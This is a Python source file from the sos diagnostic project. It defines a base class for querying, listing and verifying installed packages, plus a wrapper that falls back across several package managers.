# Copyright 2020 Red Hat, Inc. Jake Hunsaker <jhunsake@redhat.com>

# This file is part of the sos project: https://github.com/sosreport/sos
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# version 2 of the GNU General Public License.
#
# See the LICENSE file in the source distribution for further information.

import re
import fnmatch

from sos.utilities import sos_get_command_output


class PackageManager():
    """Encapsulates a package manager. If you provide a query_command to the
    constructor it should print each package on the system in the following
    format::

        package name|package.version

    You may also subclass this class and provide a _generate_pkg_list method to
    build the list of packages and versions.

    :cvar query_command: The command to use for querying packages
    :vartype query_command: ``str`` or ``None``

    :cvar verify_command: The command to use for verifying packages
    :vartype verify_command: ``str`` or ``None``

    :cvar verify_filter: Optional filter to use for controlling package
                         verification
    :vartype verify_filter: ``str`` or ``None``

    :cvar files_command: The command to use for getting file lists for packages
    :vartype files_command: ``str`` or ``None``

    :cvar chroot: Perform a chroot when executing `files_command`
    :vartype chroot: ``bool``

    :cvar remote_exec: If package manager is on a remote system (e.g. for
                       sos collect), use this to execute commands
    :vartype remote_exec: ``SoSTransport.run_command()``
    """

    query_command = None
    verify_command = None
    verify_filter = None
    files_command = None
    query_path_command = None
    chroot = None
    files = None

    def __init__(self, chroot=None, remote_exec=None):
        self._packages = None
        self.files = []
        self.remote_exec = remote_exec

        if chroot:
            self.chroot = chroot

    @property
    def packages(self):
        if self._packages is None:
            self._generate_pkg_list()
        return self._packages

    @property
    def manager_name(self):
        return self.__class__.__name__.lower().split('package', maxsplit=1)[0]

    def exec_cmd(self, command, timeout=30, need_root=False, env=None,
                 use_shell=False, chroot=None):
        """
        Runs a package manager command, either via sos_get_command_output() if
        local, or via a SoSTransport's run_command() if this needs to be run
        remotely, as in the case of remote nodes for use during `sos collect`.

        :param command:     The command to execute
        :type command:      ``str``

        :param timeout:     Timeout for command to run, in seconds
        :type timeout:      ``int``

        :param need_root:   Does the command require root privileges?
        :type need_root:    ``bool``

        :param env:         Environment variables to set
        :type env:          ``dict`` with keys being env vars to define

        :param use_shell:   If running remotely, does the command require
                            obtaining a shell?
        :type use_shell:    ``bool``

        :param chroot:      If necessary, chroot command execution to here
        :type chroot:       ``None`` or ``str``

        :returns:   The output of the command
        :rtype:     ``str``
        """
        if self.remote_exec:
            ret = self.remote_exec(command, timeout, need_root, env, use_shell)
        else:
            ret = sos_get_command_output(command, timeout, chroot=chroot,
                                         env=env)
        if ret['status'] == 0:
            return ret['output']
        # In the case of package managers, we don't want to potentially iterate
        # over stderr, so prevent the package methods from doing anything at
        # all by returning nothing.
        return ''

    def all_pkgs_by_name(self, name):
        """
        Get a list of packages that match name.

        :param name: The name of the package
        :type name: ``str``

        :returns: List of all packages matching `name`
        :rtype: ``list``
        """
        return fnmatch.filter(self.packages.keys(), name)

    def all_pkgs_by_name_regex(self, regex_name, flags=0):
        """
        Get a list of packages that match regex_name.

        :param regex_name: The regex to use for matching package names against
        :type regex_name: ``str``

        :param flags: Flags for the `re` module when matching `regex_name`

        :returns: All packages matching `regex_name`
        :rtype: ``list``
        """
        reg = re.compile(regex_name, flags)
        return [pkg for pkg in self.packages if reg.match(pkg)]

    def pkg_by_name(self, name):
        """
        Get a single package that matches name.

        :param name: The name of the package
        :type name: ``str``

        :returns: The entry in `packages` for `name`, or ``None`` if not found
        :rtype: ``dict`` or ``None``
        """
        try:
            return self.packages[name]
        except Exception:
            return None

    def _parse_pkg_list(self, pkg_list):
        """
        Using the output of `query_command`, build the _packages dict.

        This should be overridden by distinct package managers and be a
        generator for _generate_pkg_list which will insert the packages into
        the _packages dict.

        This method should yield a tuple of name, version, release for each
        package parsed. If the package manager or distribution does not use a
        release field, set it to None.

        :param pkg_list: The output of the result of `query_command`
        :type pkg_list:  ``str``
        """
        raise NotImplementedError

    def _generate_pkg_list(self):
        """Generates a dictionary of packages for internal use by the package
        manager in the format::

            {'package_name': {'name': 'package_name',
                              'version': 'major.minor.version',
                              'release': 'package release' or None,
                              'pkg_manager': 'package manager name'}}

        """
        if self._packages is None:
            self._packages = {}

        if self.query_command:
            cmd = self.query_command
            pkg_list = self.exec_cmd(cmd, timeout=30, chroot=self.chroot)

            for pkg in self._parse_pkg_list(pkg_list):
                self._packages[pkg[0]] = {
                    'name': pkg[0],
                    'version': pkg[1].split('.'),
                    'release': pkg[2],
                    'pkg_manager': self.manager_name
                }

    def pkg_version(self, pkg):
        """Returns the entry in self.packages for pkg if it exists

        :param pkg: The name of the package
        :type pkg: ``str``

        :returns: Package name and version, if package exists
        :rtype: ``dict`` if found, else ``None``
        """
        if pkg in self.packages:
            return self.packages[pkg]
        return None

    def all_files(self):
        """
        Get a list of files known by the package manager

        :returns: All files known by the package manager
        :rtype: ``list``
        """
        if self.files_command and not self.files:
            cmd = self.files_command
            files = self.exec_cmd(cmd, timeout=180, chroot=self.chroot)
            self.files = files.splitlines()
        return self.files

    def pkg_by_path(self, path):
        """Given a path, return the package that owns that path.

        :param path:    The filepath to check for package ownership
        :type path:     ``str``

        :returns:       The output lines naming the owning package, or
                        'unknown'
        :rtype:         ``list`` of ``str``, or ``str``
        """
        if not self.query_path_command:
            return 'unknown'
        try:
            cmd = f"{self.query_path_command} {path}"
            pkg = self.exec_cmd(cmd, timeout=5, chroot=self.chroot)
            return pkg.splitlines() or 'unknown'
        except Exception:
            return 'unknown'

    def build_verify_command(self, packages):
        """build_verify_command(self, packages) -> str
            Generate a command to verify the list of packages given
            in ``packages`` using the native package manager's
            verification tool.

            The command to be executed is returned as a string that
            may be passed to a command execution routine (e.g.
            ``sos_get_command_output()``).

            :param packages: a string, or a list of strings giving
                             package names to be verified.
            :returns: a string containing an executable command
                      that will perform verification of the given
                      packages.
            :rtype: str or ``NoneType``
        """
        if not self.verify_command:
            return None

        # all_pkgs_by_name_regex() returns an empty list when no package
        # matches a given pattern: drop those so we avoid building an
        # rpm -V command line with the empty string as the package list.
        # Materialize the result as a list, since a bare filter object is
        # always truthy and would defeat the emptiness check below.
        by_regex = self.all_pkgs_by_name_regex
        verify_list = list(filter(None, map(by_regex, packages)))

        # No packages after regex match?
        if not verify_list:
            return None

        verify_packages = ""
        for package_list in verify_list:
            for package in package_list:
                # verify_filter defaults to None; treat that as no filter
                if any(f in package for f in self.verify_filter or ()):
                    continue
                if verify_packages:
                    verify_packages += " "
                verify_packages += package
        return self.verify_command + " " + verify_packages


class MultiPackageManager(PackageManager):
    """
    This class is used to leverage multiple individual package managers as a
    single entity on systems that support multiple concurrent package managers.

    Policies that use this approach will need to specify a primary package
    manager, and at least one fallback manager. When queries are sent to this
    manager, the primary child manager is checked first. If there is a valid,
    not None, response (e.g. a given package is installed) then that response
    is used. However, if the response is empty or None, the fallback managers
    are then queried in the order they were passed to MultiPackageManager
    during initialization.

    :param primary: The primary package manager to rely on
    :type primary:  A subclass of `PackageManager`

    :param fallbacks: A list of package managers to use if the primary does not
                      provide a response
    :type fallbacks: ``list`` of `PackageManager` subclasses
    """

    def __init__(self, primary, fallbacks, chroot=None, remote_exec=None):
        super().__init__(chroot=chroot, remote_exec=remote_exec)

        if not issubclass(primary, PackageManager):
            raise Exception(
                "Primary package manager must be PackageManager subclass, not"
                f" {primary}"
            )

        if not isinstance(fallbacks, list):
            raise Exception('Fallbacks must be specified in a list')

        for pm in fallbacks:
            if not issubclass(pm, PackageManager):
                raise Exception(
                    "Fallback package managers must be PackageManager "
                    f"subclass, not {pm}"
                )

        self.primary = primary(chroot=chroot, remote_exec=remote_exec)
        self.fallbacks = [
            pm(chroot=chroot, remote_exec=remote_exec) for pm in fallbacks
        ]

        if not self.fallbacks:
            raise Exception(
                'Must define at least one fallback package manager'
            )

        self._managers = [self.primary]
        self._managers.extend(self.fallbacks)

    def _parse_pkg_list(self, pkg_list):
        """
        Using the output of `query_command`, build the _packages dict.

        This should be overridden by distinct package managers and be a
        generator for _generate_pkg_list which will insert the packages into
        the _packages dict.

        This method should yield a tuple of name, version, release for each
        package parsed. If the package manager or distribution does not use a
        release field, set it to None.

        :param pkg_list: The output of the result of `query_command`
        :type pkg_list:  ``str``
        """
        raise NotImplementedError

    def all_files(self):
        if not self.files:
            for pm in self._managers:
                self.files.extend(pm.all_files())
        return self.files

    def _generate_pkg_list(self):
        if self._packages is None:
            self._packages = {}

        self._packages.update(self.primary.packages)
        for pm in self.fallbacks:
            _pkgs = pm.packages
            for pkg in _pkgs.keys():
                if pkg not in self._packages:
                    self._packages[pkg] = _pkgs[pkg]

    def _pm_wrapper(self, method):
        """
        This wrapper method is used to provide implicit iteration through the
        primary and any defined fallback managers that are set for a given
        instance of MultiPackageManager.

        Important note: we pass the _name_ of the method to run here as a
        string, and not any actual method as we rely on iteratively looking up
        the actual method in each package manager.

        :param method: The name of the method we're wrapping for the purpose of
                       iterating through defined package managers
        :type method:  ``str``
        """
        def pkg_func(*args, **kwargs):
            ret = None
            for pm in self._managers:
                if not ret or ret == 'unknown':
                    _wrapped_func = getattr(pm, method)
                    ret = _wrapped_func(*args, **kwargs)
            return ret
        return pkg_func

    def __getattribute__(self, item):
        # if the attr is callable, then we need to iterate over our child
        # managers until we get a response, unless it is _generate_pkg_list or
        # all_files, in which case we only want to use the ones actually
        # defined here, or _pm_wrapper, which must bypass this override to
        # avoid infinite recursion.
        if item in ['_generate_pkg_list', '_pm_wrapper', 'all_files']:
            return super().__getattribute__(item)
        attr = super().__getattribute__(item)
        if hasattr(attr, '__call__'):
            return self._pm_wrapper(item)
        return attr

# vim: set et ts=4 sw=4 :
